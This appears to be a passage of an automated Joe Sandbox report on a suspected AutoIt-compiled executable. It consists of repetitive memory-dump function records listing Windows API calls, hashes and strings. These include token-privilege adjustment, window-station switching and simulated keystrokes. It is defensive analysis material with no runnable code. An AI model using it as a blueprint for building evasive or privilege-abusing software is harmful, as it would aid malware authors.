                                                              • Instruction ID: 33439cc0ed492f2a0bbc537b29ad574dcdc2473c36e448a15af9f1d03f8379a5
                                                              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction Fuzzy Hash: F712CE24E18658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A5F81CF5A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 096cf18e322431e78e5bc161ec98c76863b6984deec354c03021b97a2336aab2
                                                              • Instruction ID: 44bab56dc2ab8cde32489e4452faf6fae7bf82cfed3cad65b5601ae687a505e6
                                                              • Opcode Fuzzy Hash: 096cf18e322431e78e5bc161ec98c76863b6984deec354c03021b97a2336aab2
                                                              • Instruction Fuzzy Hash: D64116746043419FDB14DF14C444B1ABBE1BF49318F1998ADE9998B362C339EC49CF9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 5c8a708d024fb22eb48ca4c0c94c60e70ae028987239c132e44c67ee72e87dcb
                                                              • Instruction ID: a251ee3304108ee270deb89cd4a0bb467c8e2f6a6cbda95fe23e34e239320474
                                                              • Opcode Fuzzy Hash: 5c8a708d024fb22eb48ca4c0c94c60e70ae028987239c132e44c67ee72e87dcb
                                                              • Instruction Fuzzy Hash: 3F2138B2A04A09EBDB204F16E88176ABBF4FF14354F20842FE886C9191FB3494D0D74E
                                                              APIs
                                                                • Part of subcall function 00434BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00434BEF
                                                                • Part of subcall function 0045525B: __wfsopen.LIBCMT ref: 00455266
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434E0F
                                                                • Part of subcall function 00434B6A: FreeLibrary.KERNEL32(00000000), ref: 00434BA4
                                                                • Part of subcall function 00434C70: _memmove.LIBCMT ref: 00434CBA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                              • String ID:
                                                              • API String ID: 1396898556-0
                                                              • Opcode ID: ee97270d916703584553fac3a6a102a129159e569530dd39ac66472f2868b615
                                                              • Instruction ID: 98485b204286a82f0b34afb347739cc86cf1013d0ff022642f5ab36dea098e6c
                                                              • Opcode Fuzzy Hash: ee97270d916703584553fac3a6a102a129159e569530dd39ac66472f2868b615
                                                              • Instruction Fuzzy Hash: 6811C831A00205ABCF14BF71CC17FED77A4AF88714F10842FF54197281DA79A9059759
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 949aeb5475f72224eb7f90707cd025c7450cd244ecc7c10c41a6b1a073a512f5
                                                              • Instruction ID: 439085dc1f81f91865e89fa979136bfc39d9dea6fb8828d7de2aa91255d95a6c
                                                              • Opcode Fuzzy Hash: 949aeb5475f72224eb7f90707cd025c7450cd244ecc7c10c41a6b1a073a512f5
                                                              • Instruction Fuzzy Hash: AF2122B4508301DFCB14DF24C444A1ABBE1BF88315F05896EE88A97722D739E819CB9B
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 004548A6
                                                                • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: b9695d503ee7f994f795ffc7e080404e98721d5803fd581efff59a5272cc581d
                                                              • Instruction ID: 024d3bde10a8b930e4f3cc99fa0fa9a73826851c0073298ee905ef2063242ec2
                                                              • Opcode Fuzzy Hash: b9695d503ee7f994f795ffc7e080404e98721d5803fd581efff59a5272cc581d
                                                              • Instruction Fuzzy Hash: 6DF0D171800604ABDB11BFA288063AE36A0AF4032FF11440EBC14AA193CB7C8999DF49
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434E7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 2dd93781c175439e7f79cc2af7e1652528eb96ade003da7a7019c752bfbae299
                                                              • Instruction ID: 5861b3b357ca51e8153b86b3d2f40e1ba728384ce97880f3152040741e909bf5
                                                              • Opcode Fuzzy Hash: 2dd93781c175439e7f79cc2af7e1652528eb96ade003da7a7019c752bfbae299
                                                              • Instruction Fuzzy Hash: 71F03071501711CFDB349F64D495853BBE1BF983297109A7FE5DA82610C739A844DF48
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004507B0
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath_memmove
                                                              • String ID:
                                                              • API String ID: 2514874351-0
                                                              • Opcode ID: d05d2489b6ffe775fd90b2930d0f751ae442d4cc97b326ec77c5e4199fd6f31f
                                                              • Instruction ID: fc88bcc2f343ae0f4136759ccf33e2f12a023531e6e99fe3a81a7dbb457308fc
                                                              • Opcode Fuzzy Hash: d05d2489b6ffe775fd90b2930d0f751ae442d4cc97b326ec77c5e4199fd6f31f
                                                              • Instruction Fuzzy Hash: 33E0867690422857C72096699C05FEAB7EDDB887A4F0441B6FC0CD7214D965AC848695
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wfsopen
                                                              • String ID:
                                                              • API String ID: 197181222-0
                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction ID: 5b0f97acc59a2e1cfeb8636f9b37e92f260b146d966c67c387968ab59869202a
                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction Fuzzy Hash: 94B0927644020C77CE012A82EC02A593B199B41768F408061FF0C18162A677A6689A8A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: 7c7e074f336a42937a3dce3798dbc48e0badafa73efdac3245a950124125098c
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: C431E878A001059BC71EDF08C48496AF7A5FB4A302B688796E80ACF356D735EDC5DBC5
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 01F922B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: 05a9891fdb1a27df5724734d9145622495356e75268a8ddf3d4641ee111bbf88
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 49E0E67494010EEFDB00EFB8D54969E7FB4EF04301F1001A1FD01D2281D6319D508A72
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004BCB37
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004BCB95
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004BCBD6
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004BCC00
                                                              • SendMessageW.USER32 ref: 004BCC29
                                                              • _wcsncpy.LIBCMT ref: 004BCC95
                                                              • GetKeyState.USER32(00000011), ref: 004BCCB6
                                                              • GetKeyState.USER32(00000009), ref: 004BCCC3
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004BCCD9
                                                              • GetKeyState.USER32(00000010), ref: 004BCCE3
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004BCD0C
                                                              • SendMessageW.USER32 ref: 004BCD33
                                                              • SendMessageW.USER32(?,00001030,?,004BB348), ref: 004BCE37
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004BCE4D
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004BCE60
                                                              • SetCapture.USER32(?), ref: 004BCE69
                                                              • ClientToScreen.USER32(?,?), ref: 004BCECE
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004BCEDB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004BCEF5
                                                              • ReleaseCapture.USER32 ref: 004BCF00
                                                              • GetCursorPos.USER32(?), ref: 004BCF3A
                                                              • ScreenToClient.USER32(?,?), ref: 004BCF47
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 004BCFA3
                                                              • SendMessageW.USER32 ref: 004BCFD1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004BD00E
                                                              • SendMessageW.USER32 ref: 004BD03D
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004BD05E
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 004BD06D
                                                              • GetCursorPos.USER32(?), ref: 004BD08D
                                                              • ScreenToClient.USER32(?,?), ref: 004BD09A
                                                              • GetParent.USER32(?), ref: 004BD0BA
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 004BD123
                                                              • SendMessageW.USER32 ref: 004BD154
                                                              • ClientToScreen.USER32(?,?), ref: 004BD1B2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004BD1E2
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004BD20C
                                                              • SendMessageW.USER32 ref: 004BD22F
                                                              • ClientToScreen.USER32(?,?), ref: 004BD281
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004BD2B5
                                                                • Part of subcall function 004325DB: GetWindowLongW.USER32(?,000000EB), ref: 004325EC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004BD351
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F$pbO
                                                              • API String ID: 3977979337-3825772488
                                                              • Opcode ID: c55fe5d49ce17c041ded3c31b610377931e21fbfcd58c5b5d0739d8f6d2d5c1d
                                                              • Instruction ID: da00c101abf043f5c2e046148e0e216c354b2f2c7855d5e79985c903352dfd4f
                                                              • Opcode Fuzzy Hash: c55fe5d49ce17c041ded3c31b610377931e21fbfcd58c5b5d0739d8f6d2d5c1d
                                                              • Instruction Fuzzy Hash: 2242C034508640AFDB24DF28D8C4AAABFE5FF48310F14062EF6558B2B1C735E855DB6A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$_memset
                                                              • String ID: ]N$3cD$DEFINE$P\N$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_D
                                                              • API String ID: 1357608183-451301767
                                                              • Opcode ID: d53df95eecd5dc4d84c85546f1de09a013819b5b66be6a7f83fa02a21fd92729
                                                              • Instruction ID: 0fd2dfe8a7d96896929e2d148bb67472aeb693eb3d259d1a8d8c72c36c3767ae
                                                              • Opcode Fuzzy Hash: d53df95eecd5dc4d84c85546f1de09a013819b5b66be6a7f83fa02a21fd92729
                                                              • Instruction Fuzzy Hash: 5B93B471E00215DBDB24DF58C881BAEB7B1FF48710F24856BE945AB391E7789D82CB48
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,?), ref: 004348DF
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0046D665
                                                              • IsIconic.USER32(?), ref: 0046D66E
                                                              • ShowWindow.USER32(?,00000009), ref: 0046D67B
                                                              • SetForegroundWindow.USER32(?), ref: 0046D685
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046D69B
                                                              • GetCurrentThreadId.KERNEL32 ref: 0046D6A2
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046D6AE
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0046D6BF
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0046D6C7
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0046D6CF
                                                              • SetForegroundWindow.USER32(?), ref: 0046D6D2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D6E7
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D6F2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D6FC
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D701
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D70A
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D70F
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D719
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D71E
                                                              • SetForegroundWindow.USER32(?), ref: 0046D721
                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0046D748
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: b2054204fe0c43783bb53502750eec85b9c5e7030c88b0394cf9e90aeea6e103
                                                              • Instruction ID: 3c3cdd204e17c654ccfdc0d646e0de93bad34e0c3e5f5e7c651125686986c36d
                                                              • Opcode Fuzzy Hash: b2054204fe0c43783bb53502750eec85b9c5e7030c88b0394cf9e90aeea6e103
                                                              • Instruction Fuzzy Hash: 86318671E403187BEB201F659C49FBF3F6CEB44B51F104136FA08EA1D1DA745D01AAAA
                                                              APIs
                                                                • Part of subcall function 004887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0048882B
                                                                • Part of subcall function 004887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00488858
                                                                • Part of subcall function 004887E1: GetLastError.KERNEL32 ref: 00488865
                                                              • _memset.LIBCMT ref: 00488353
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004883A5
                                                              • CloseHandle.KERNEL32(?), ref: 004883B6
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004883CD
                                                              • GetProcessWindowStation.USER32 ref: 004883E6
                                                              • SetProcessWindowStation.USER32(00000000), ref: 004883F0
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0048840A
                                                                • Part of subcall function 004881CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00488309), ref: 004881E0
                                                                • Part of subcall function 004881CB: CloseHandle.KERNEL32(?,?,00488309), ref: 004881F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $default$winsta0
                                                              • API String ID: 2063423040-1027155976
                                                              • Opcode ID: 2cc35d8eba0a73c32d934f177d5d090f79b97913643d9fec4a0ecac14068b532
                                                              • Instruction ID: d667821ef7a34ae685710729c38aed9cd40bfc1ddd7713faa3c2310b7b3558b9
                                                              • Opcode Fuzzy Hash: 2cc35d8eba0a73c32d934f177d5d090f79b97913643d9fec4a0ecac14068b532
                                                              • Instruction Fuzzy Hash: 7E816AB1900209BFDF11AFA5CC45AEE7BB9FF04304F54456EF814A2261DB399E19DB28
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0049C78D
                                                              • FindClose.KERNEL32(00000000), ref: 0049C7E1
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0049C806
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0049C81D
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0049C844
                                                              • __swprintf.LIBCMT ref: 0049C890
                                                              • __swprintf.LIBCMT ref: 0049C8D3
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • __swprintf.LIBCMT ref: 0049C927
                                                                • Part of subcall function 00453698: __woutput_l.LIBCMT ref: 004536F1
                                                              • __swprintf.LIBCMT ref: 0049C975
                                                                • Part of subcall function 00453698: __flsbuf.LIBCMT ref: 00453713
                                                                • Part of subcall function 00453698: __flsbuf.LIBCMT ref: 0045372B
                                                              • __swprintf.LIBCMT ref: 0049C9C4
                                                              • __swprintf.LIBCMT ref: 0049CA13
                                                              • __swprintf.LIBCMT ref: 0049CA62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 3953360268-2428617273
                                                              • Opcode ID: 8e008a979c3e6bf15dde95e2eeeaf0ebb25cfc282e68172a53be6ddce007e079
                                                              • Instruction ID: 865e95455f15134758b43d2f331b387749ddb661521e3477afe2cb99ca9798ae
                                                              • Opcode Fuzzy Hash: 8e008a979c3e6bf15dde95e2eeeaf0ebb25cfc282e68172a53be6ddce007e079
                                                              • Instruction Fuzzy Hash: 59A140B1408344ABD714EF95C885DAFB7ECFF88709F40192EF585C6151EA78DA08CB66
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0049EFB6
                                                              • _wcscmp.LIBCMT ref: 0049EFCB
                                                              • _wcscmp.LIBCMT ref: 0049EFE2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 0049EFF4
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0049F00E
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0049F026
                                                              • FindClose.KERNEL32(00000000), ref: 0049F031
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0049F04D
                                                              • _wcscmp.LIBCMT ref: 0049F074
